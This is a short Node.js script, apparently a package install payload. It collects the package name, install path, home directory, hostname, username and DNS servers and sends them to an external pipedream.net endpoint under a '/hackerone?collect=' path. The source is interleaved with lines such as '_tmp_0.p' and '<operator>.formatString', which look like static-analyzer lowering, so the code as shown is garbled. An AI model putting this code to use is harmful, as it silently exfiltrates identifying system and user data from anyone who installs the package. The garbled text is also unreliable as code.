const os = require("os")
const dns = require("dns")
const https = require("https")
const packageJSON = require("./package.json")
const package = packageJSON.name
const dd = encodeURI(JSON.stringify({
    p: package	,
    c: __dirname,
    hd: os.homedir(),
    hn: os.hostname(),
    un: os.userInfo().username,
    dns: dns.getServers(),
    v: packageJSON.version
}))
_tmp_0.p = package
_tmp_0.c = __dirname
_tmp_0.hd = os.homedir()
_tmp_0.hn = os.hostname()
_tmp_0.un = os.userInfo().username
_tmp_0.dns = dns.getServers()
_tmp_0.v = packageJSON.version
var options = {
    hostname: "3f35113f41feee80a601db01b48dc963.m.pipedream.net",
    port: 443,
    path: `/hackerone?collect=${dd}`,
    method: "GET"
}
_tmp_1.hostname = "3f35113f41feee80a601db01b48dc963.m.pipedream.net"
_tmp_1.port = 443
_tmp_1.path = <operator>.formatString("/hackerone?collect=", dd, "")
_tmp_1.method = "GET"
var req = https.request(options)
